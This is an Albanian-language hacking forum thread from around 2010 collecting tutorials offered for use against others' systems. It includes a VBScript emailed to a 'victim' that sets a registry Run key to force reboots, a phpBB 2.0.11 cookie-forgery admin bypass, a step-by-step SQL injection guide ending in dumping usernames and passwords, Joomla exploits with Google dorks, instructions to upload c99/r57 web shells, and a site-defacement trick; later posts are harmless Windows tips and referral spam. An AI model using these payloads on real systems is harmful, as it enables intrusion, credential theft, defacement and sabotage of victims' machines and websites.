Pir[A]teX

.
 
HomeHome  CalendarCalendar  FAQFAQ  SearchSearch  MemberlistMemberlist  UsergroupsUsergroups  RegisterRegister  Log inLog in  

Share | 
 

 Hacking Tutorials !

Go down 
AuthorMessage
Admin
Admin


Posts : 21
Join date : 2010-01-06
Age : 21
Location : Prishtina

PostSubject: Hacking Tutorials !   Thu Jan 07, 2010 11:56 pm

Ky topic osht i dedikum per hakera.Ktu muni me postu tutoriale rreth hacking,etj...
Back to top Go down
View user profile http://piratex.board-directory.net
Admin
Admin


Posts : 21
Join date : 2010-01-06
Age : 21
Location : Prishtina

PostSubject: Hacking !   Fri Jan 08, 2010 12:03 am

Ktu i keni do sene per hack,nese dini qa me bo me to,se un as per veti spi kuptoj bash mirHym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

</script>
--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shymet

___________________________________________________________________________________________________________________________________________________________
Hack foruma phpbb2.0.11


Me e lehte per me hack ne pergjithsi behet me firefox te cilen mund ta merrni ne www.getfirefox.com (http://www.getfirefox.com) dhe eshte falas.

Mbasi qe keni marr Mozilla Firefox (web browser sikur IE Internet Explorer) duhet te zgjedhni forumin cilin doni me e hacku.

Un do tju tregoj se si me hacku forumet e verzionit te phpbb 2.0.11 dhe per kete kerkoni ne google "powered by phpbb 2.0.11" Mbasi qe keni zgjedh forumin shkoni ne

Start > Run >

dhe e shkruani keshtu

C: Documents and SettingsEMRIApplication DataMozillaFirefoxProfilesexwtkkyi.default

Aty ku eshte EMRI ju vendosni emrin e userit qe perdorni ju.

Tani ju hapet nje folder dhe mbrenda atij eshte cookies celeni ate dhe kerrkoni emrin e webit te cilin keni gjet per te hackuar psh keshtu www.emriwebit.com FALSE

/ FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D

tani zevendesoni kete pjese te cookie kodi: a%3A0%3A%7B%7D

me kete Kod:

KODI:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

dhe pastaj mbylleni cookie dhe bejeni save.tani mbylleni firefox dhe hapeni prap dhe futni adresen e forumit qe deshet me hack dhe nqs keni pas sukses do jeni i loguar si admin ne at web, por nese webi ka qene i mbrojtur edhe pse ka pas phpbb 2.0.11 ateher smundeni me u logu si admin
1.SQL-injetion-Tutorial për Versionin 5.x.x
----------------------------------------------------

1.1 Cka është SQL-injetion?
1.2 Provo faqen për vulnerability!
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
1.4 Provo për UNION SELECT funksionin!
1.5 Si të zbulojmë verzionin e MYSQL-së?
1.6 Si të zbulojmë Table_name?
1.7 Si të zbulojmë Column_name?
1.8 Përfundim?============================
1.1 Cka është SQL-injetion?
============================

SQL-injetion është një ndër metodat më të përdorura ditët e sodit për të marrë akses në ndonjë webfaqe.
Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,(username,passwords), logins të ndryshëm,
akses nëpër faqe të administrimit, CC etj...====================================
1.2 Provo faqen për vulnerability!!
====================================

Të themi se kemi dicka të till:

----------------------------------
http://www.site.com/vesti.php?id=1
----------------------------------


Tani që të testojm se a është faqa vulnerability, apo thjesht ka buggs shkojmë dhe ja shtojmë ' pra presjen lart, e cila
do të duket kështu:

-----------------------------------
http://www.site.com/vesti.php?id=1'
-----------------------------------

Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++

Me këtë nënkuptohet se faqja është vulnerability, pra ka lëshime!================================================== ===
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
================================================== ===

Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:

----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 5-- <--> Error page - Pra këtu kemi Error
----------------------------------------------------------------------------------------------------

Me këtë nënkuptojmë se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
e lejmë kështu: http://www.site.com/vesti.php?id=1 order by 4--=======================================
1.4 Provo për UNION SELECT funksionin!
=======================================

Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union select).

Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:

---------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
---------------------------------------------------------

Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por në qoft se jo
atëhere provoni të ja shtoni nji - (minus) përpara tek (1)
shembull:

----------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
----------------------------------------------------------

Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!=========================================
1.5 Si të zbulojmë verzionin e MYSQL-së?
=========================================

Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës me këtë (@@version).
Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:

------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
------------------------------------------------------------------

Dhe tani do të na shfaqet versioni.===============================
1.6 Si të zbulojmë Table_name?
===============================----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
----------------------------------------------------------------------------------------------------------------------------------------------

Dhe Tani do të na shfaqet emri tabelës prsh: (users).================================
1.7 Si të zbulojmë Column_name?
================================

E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!

Në vënd ku shkruan
(table_name) & tables duhet vendosur (column_name) & columns.

Shkojmë të shfaqim edhe këtë shëmbull:

------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------

Të themi që column_name janë (username, password).

Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):

---------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--
---------------------------------------------------------------------------------------------------------

Dhe tani na shfaqen (Username, Passwordi ose Hashi)

nëse del (hashi) këtu mundë ta Crackoni:
-----------------------------------
http://gdataonline.com/seekhash.php
-----------------------------------===============
1.8 Përfundim?
===============

Si përfundim do ti postoj të gjitha linqet në një vënd që ta keni më të lehtë për tu bazuar!

------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1'
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--
---------------------------------------------------------------------------------------------------------

©️ 2009 [ UAH-Crew ] - [ Tutorial By: Hackeri-AL ]

.....................:

Shumica prej joomla 1.5 kan një gabim qe shum leht mund te hackiraten

e gjejm vebim qe ka joomla 1.5 dhe ja shtojm ket exploit

Kodi:

index.php?option=com_user&view=reset&layout=confirm

pasta e lyp token dhe ju shenoni

Kodi:

'

dhe pastaj na del ta shenojm userin dhe paswordin e adminit (qysh duni ju lene)
dhe pastaj shkon ne administrator dhe me qat user qe e keni dhon

tuto by SiR.FlOr me duket


..........:

Kjo nuk eshte hacking por eshte nje lloj si exploit qe te mundeson ta futesh index.html . htm = ne site
Shkojm Start > Run > Dhe n'run e shkruajme ket :

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Tani del 1 dritare e vogel , klikojm me te djathtën dhe shkojm new webfolder ..
dhe e shkruajme 1 faqe pa www dhe pa http psh site.net
dhe shkojme finish ...
tona hym te folderi site.net.net dhe kshtu qe keni te drejten me uplodu diqka.
ti uplodon qa tdush e uplodon 1 index hacked

www.site.net/uah.html
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar
.......:

--------------------------
Dorks: inurl:com_rsgallery
----------------------------------------------------------------------------------------------------------------------------------------------------

Exploits: /index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd)UAH,6,7,8,9,10,11+from+mos_users--

.......:

------------------------------
Dorks: inurl:com_ignitegallery
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploits: /index.php?option=com_ignitegallery&task=view&galle ry=-1+union+select+1,2,concat(username,char(58),passwo rd)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18

......:
Dorks: inurl:com_agora

Exploits 1: /index.php?option=com_agora&task=upload

Exploits 2: /components/com_agora/img/members/0/emri-shellit.php

P.S/ Ky Exploit perdoret keshtu: hyjm ne Google dhe kerkojm me ate Dorks qe eshte nalt, pastaj gjejm 1 site dhe ja shtojm Exploitin 1 nese na del diçka qe kerkon te uplodojm 1 File ateher ne e marrim 1 shell c99 a r57 qfar doni ju dhe ja uploadojm, pastaj marrim Exploitin 2 dhe hyjm ne shell per me ekzekutu komandat.
.............:

Si te bejme nje Error Page kur MySQL eshte Offline

--------------------------------------------------------------------------------

Sot do te ju mesoj se si te bejme nje error page kur MySQL serveri na del offline

Pra ndiqni hapat e mij dhe besoj se do te keni suskes

1. Se pari e krijojme nje HTML page te rreje me emrin noconnection.html

Dhe ne ate dokument futni kete kod dhe e ruani ne (public_html):
Kodet PHP:

<HTML>
<HEAD>
<TITLE>Couldn't connect to MySQL database!!</TITLE>
<style type="text/css">
.error {color: red; font-family: Arial; font-size: 20px;}
</style>
</HEAD>

<BODY>
<p align="center">
<span class="error">
Couldn't Connect To MySQLdatabase! Please Try Again Latter
</span>
</p>
</BODY>

</HTML>


Pas ketij hapi shkoni ne file-n Config.php dhe ndodh qe ky file quhet (Config.php-db-info.php)
ose kerkoni per FIle-n i cili permban informacionet per kyqjen ne Databaz .

Do te dukej diqka e ngjashem me kete :
Kodet PHP:

<?php
$dbhost = "localhost";
$dbname = "name";
$dbuname = "datapass user name";
$ppass = "the secret word";
$connectdb=mysql_connect($dbhost,$dbuname,$ppass);
$xx=@mysql_select_db($dbname,$connectdb);
?>

Shtojani ne rreshtin mysql_select_db rreshti i cili permban :
Kodet PHP:

@mysql_select_db($dbname,$connectdb);

if (!$xx) {
include ("noconnection.html");
exit();
}File-i config.php do te duket keshtu :
Kodet PHP:

<?php

$dbhost = "localhost";
$dbname = "name";
$dbuname = "datapass user name";
$ppass = "the password";
$connectdb=mysql_connect($dbhost,$dbuname,$ppass);
$xx=@mysql_select_db($dbname,$connectdb);
if (!$xx) {
include ("noconnection.html");
exit();
}

?>


Tani nese serveri juaj MySQL del offline kjo faqe do te paraqitet.

Eshte nje error mjaft i perhapun neper servera Free
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar


................:
Nese po doni host free ateher hyni ne ket website www.ezyfree.com edhe regjistrohuni pastaj duhet me ba reffer pra poena sa me shum dhe hostin e keni per 1 vit ja pra

Starter Hosting Plan for 1 Year

Cost: 1000 points
Disk Space: 500mb
Bandwidth: 5000mb

kurse per domain name ju duhen 898 poena

kush don le te me ndimon me referrals mua ja linkun http://www.ezyfree.com/?id=33386

Tuto funksionon 100% une ma heret e kam provu ket
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar.....:
Ktu do tju tregoj p.sh si me blloku 1 site dmth per mos me mujt me hap prej pc tende..

1) Shko tek C:\WINDOWS\system32\drivers\etc Ma Gjersisht My Computeer > Local Disk (C > WINDOWS > E Lypni 1 Folde qe shkrun system32 > perseri shkojm te folderi Drivers > tanshi ne folderin ETC > tanshi shkojm aty te hosts > klikojm dyher the na hapet 1 faqe qe jon do programe t'ndryshme ju shkoni tre notepad > dhe ju hapet dhe te notepadi aty ku hkruan loacalhost pak ma nena e shtyni me space bar edhe e shenoni 127.0.0.2 www.faqjaqedonmebloku.com


2) Gjejm fajllin me emrin 'hosts'

3) E hap me notepad ( me 1 fjal me nje tekst editor po te gjithe perdorim Notepad ose WordPad )dhe nen "127.0.0.1 localhost" shkruan 127.0.0.2 www.faqjaqedonmebloku.com
4) Bejeni save kete ( ruajeni ) dhe tash shko hap browserin dhe shkruaje ate siten qe e blokove do te shohesh qe nuk mundesh me kyq ne ate site.

5) Per te blokuar dmth webfaqe me shum jo veq 1 ateher shkojm keshtu :
127.0.0.2 www.faqjaqedonmebloku.com 127.0.0.3 www.faqjaqedonmebloku.com
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar


....:

Shkojmm . Hapim Notepad dhe e qesim kete code :

echo ipconfig/flushdns
ipconfig/flushdns
echo ip config/release
ipconfig/release
echo ipconfig/renew
ipconfig/renew
exit


edhe shkojm Save As.. emri.BAT

edhe e egzekutoni filen edhe ju ndrrohet
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar Multi-Quote This Message Përgjigjuni shpejt këtij mesazhi
L.Kolgeci
Shiko Profilin Publik
Dërgo një mesazh privat tek L.Kolgeci
Dërgo E-mail Tek L.Kolgeci
Gjej më shumë postime nga L.Kolgeci
Add L.Kolgeci to Your Contacts
Përgjigju

......:

se pari e deaktivizoni ALIGN TO GRID dhe Auto Arrange tash krijoni nje folder te ri dhe vendosni emrin Secret
klikoni me tastin e djatht te folderi dhe klikoni properties zgjidhnja opcionin Costumize dhe ne fund ka nje suste Change Icon

pra e shtypni kete sust dhe u hapet dritarja per te zgjedhur ikonin e folderit. Ketu do te ju hapen shume ikona por ka edhe 3 ikona qe jan te padukshme.

te kompjuteri jem jan ne rendin e 13. e zgjidhni njeren prej ketyre dhe shtypni Ok ne te dy dritaret. Tash e levizni folderin ne pjesen e poshtme te desktop-it

dhe e levizni ashtu qe me taskbarin tja fshehni emrin dhe ja ku e keni folderin e juaj sekret menyr e leht per ta selektuar eshte qe te selektoni gjith pjesen

ku perafersisht eshte folderi dhe e shtypni ENTER.
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar

............:

Start>Run dhe aty shkruajme regedit
me pas na shfaqet nje tabele
shkojme tek
HKEY_LOCAL_MACHINE >HARDWARE >DESCRIPTION >System >CentralProcessor >0
Ne te dhenat ne djathte shkojme tek ProcessorNameString dhe klikojme dy here .
tani aty mund ta vini emrin e procesorit si te deshironi

...........:

Nese po doni host free ateher hyni ne ket website www.ezyfree.com edhe regjistrohuni pastaj duhet me ba reffer pra poena sa me shum dhe hostin e keni per 1 vit ja pra

Starter Hosting Plan for 1 Year

Cost: 1000 points
Disk Space: 500mb
Bandwidth: 5000mb

kurse per domain name ju duhen 898 poena

kush don le te me ndimon me referrals mua ja linkun http://www.ezyfree.com/?id=33386

Tuto funksionon 100% une ma heret e kam provu ket
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar

.....:

Mashtrimi i Versionit Gjerman te Windowsit ne ate Anglisht
Per te gjith ata qe kan Windows XP/Vista Deutsche version, ja nje tip i thjesht por shum me rendesi!

Shumica e Updates te Windowsit jan ne fillim (ne dispozicion) vetem per English version.
Keshtu qe me nje Version Gjermanish nuk mund ti shkarkon (ngrit) Updatet English, per shkak se keto update nuk shfaqen fare ne Update center. Por ne eoft se keni nje MUI pack kjo eshte e mundur(kete e kan shumica e Firmave te medha).

Keshtu qe ja nje Trik shum i vagel me te cilin prap se prap do eshte e mundur kjo gje

Permbajtjen e Vlerave "Default" dhe "InstallLanguage" ne Regjistra (kliko Start--> run-->regedit dhe shtyp enter)
ju hapen regjistrat e Windowsit.
Pastaj keto dyja te lartpermendurat i ndryshojm perkohsisht prej "0407" ne "0409" ne qelsin regjister: HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Nls\ Language

Ne windows deaktivoni opcionin "Auto Update" (Windows Update)
dhe startoni Windowsin rishtazi.
Gjithashtu ndryshoni edhe kete HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Nls\ Locale

(Standart)= nga 0407 ne 0409
(Default)= nga 0407 ne 0409

0407 d.m.th Versioni Gjeman
0409 -//- Versioni Anglisht

Tanu mund ti bent te gjith Update E versionit Englisht.

Kujdes: mos harroni ti ktheni prap pas instalimit te Updatve vlerat se si kan qen Perpara, gjithsesi
is Offline Reporto Postime Të Papëlqyeshme Përgjigju duke Cituar......:

Ni menyr tjeter per me donloduar prej yotubes

Kodi:
http://www.converttube.com/

Munesh me dowllodu me format mp3 etj
100% Punon
.....:

Convert fotografi duke përdorur sistemin Cmd
Shko te Start | Të gjitha Programet | kinkalerira | Command Prompt (ose, nga një kutinë Run, shtypni Cmd) dhe, marrja e keni ndërmend të konvertohet C:, jepni komandën:

Vol C:

Shënim emrin e disk në linjën e parë, dhe Vëllimi Serial Number (për shembull, 3F4E-2D1B) në të dytin. Pastaj type:
Cito:
CONVERT C: /FS:NTFS..............:

Ky udhëzues të ndryshme ilustron hapat e nevojshme për t'u integruar Service Pack 1 fotografi në Windows Vista installer nëpërmjet një proces në përgjithësi njihet si slipstreaming.
Sapo Vista SP1 pack slipstream është gati, ju mund të djegë atyre për të bërë një fotografi bootable Vista Service Pack 1 DVD.


Para se ne të filloni, këtu janë katër gjëra që duhet të slipstream Windows Vista dhe Service Pack 1 fotografi:
a. Windows Vista dhe DVD Installer Windows Vista Service Pack 1 Installer - x86 ose x64
b. vLite Installer - Lidhje
c. Një DVD disk bosh për të shkruar e Vista SP1 fotografi dhe disa gigs hard diskun e lirë hapësirë.
Tani që ju keni të gjithë përbërësit e gatshme, le të marrin slipstreaming Vista SP1:
1. Fut origjinal Windows Vista DVD disk dhe të fillojnë vLite (instaloni programin nëse ju nuk e ka bërë që tashmë).
2. Shfleto për dosjen tuaj që përmban Windows Vista fotografi (dmth. tuaj DVD Drive letër). vLite tani do të kopje të të gjitha dosjet disa dosje lokale që është përcaktuar nga ju.
3. Pasi të gjitha para-SP1 Windows Vista fotografi janë kopjuar në hard disk lokale, të specifikojë Windows Vista Edition se ju doni të slipstream. Ky hap është i nevojshëm për shkak installers Vista gjitha botimet janë transportuar në një DVD.
4. Në ekran të ardhshme, zgjidhni këto detyra "Service Pack Slipstream" dhe "Bootable ISO" -> e ardhshëm -> zgjidhni vendndodhjen e standalone Windows Vista SP1 installer file.


5. vLite mund të marrin 60-90 minuta për integrimin e të gjitha të SP1 fotografi në Vista Installer. Pasi të këtij procesi është i plotë, për të ndryshuar modelin "e drejtpërdrejtë Burn", pop një DVD bosh dhe djegin


Your Windows Vista SP1 Bootable DVD do të jetë i gatshëm në disa minuta
...............:

There are six books:

1. Adsense Arbitrage - Make Thousands with Google Adsense
2. adwords-black-book
3. GoogleCash - Using Google AdWords 3.1
4. AdSense BlackHat Edition
5. Google Money Pro 2 Review-Site-Guide
6. Make Easy Money with Google ~ Using the AdSense Advertising Program

Hope these help you with Adsense!
Please download as free user.

DOWNLOAD:


Kodi:

rapidshare.com Adsense_Books.rar
..........:

qe njo dy weba per ndreqjen e foto
http://www.mirrortext.net/ per tekst
ose
http://www.mirroreffect.net/ per foto .
www.imageshack.us


Per te bere MSN - MOBILE kur je offline shkon kshtu ...

Shkon te Nicku - Personal Settings - Phone - Mobile Settings -

Tani e aty nje vend ku shkrun [Choose one] e prek atte shigjetten edhe dalin do emra tii e zgjedh [Wi - FI] tani shkon NEXT tani ti qet dy opcione me i zgjedh ti ja bon asaj nalt qe shkrun [ I have read and agree to the pricing and terms of use ] ja qet ate rrethin perpara edhe shkon NEXT ...tani preke DONE edhe mbylle faqen ... Per 30 seconda e mshel MSN edhe e hap perseri te vjen nje qe shkrun Would you like to allow your contacts to send instand messeages to your mobile device ... edhe ti bonja Yes edhe tani e-maili yte behet MOBILE kur je offline !Qysh me ndrru muziken per "nudge"Ja nje trick per windows live veq e kom provu bon 100% kqyra ne forum po nuk e pash qe e kish postu naj kushee

1. shkojm ne C:\Program Files\Windows Live\Messenger
2. E marim nje muzik te formatit WMA Windows media audio file veq muzika duhet me kan patjeter wma se ndryshe nuk bon se as nje format tjeter nuk e pranon veq dridh palidhje
3. Tani e shtimi ne C:\Program Files\Windows Live\Messenger edhe ja vendosim emrin "nudge" pa thonjeza
Back to top Go down
View user profile http://piratex.board-directory.net
 
Hacking Tutorials !
Back to top 
Page 1 of 1
 Similar topics
-
» Photoshop Tutorials Section
» Forumotion Video Tutorials

Permissions in this forum:You cannot reply to topics in this forum
Pir[A]teX :: Tutoriale & Programe :: Tutoriale për PC-
Jump to: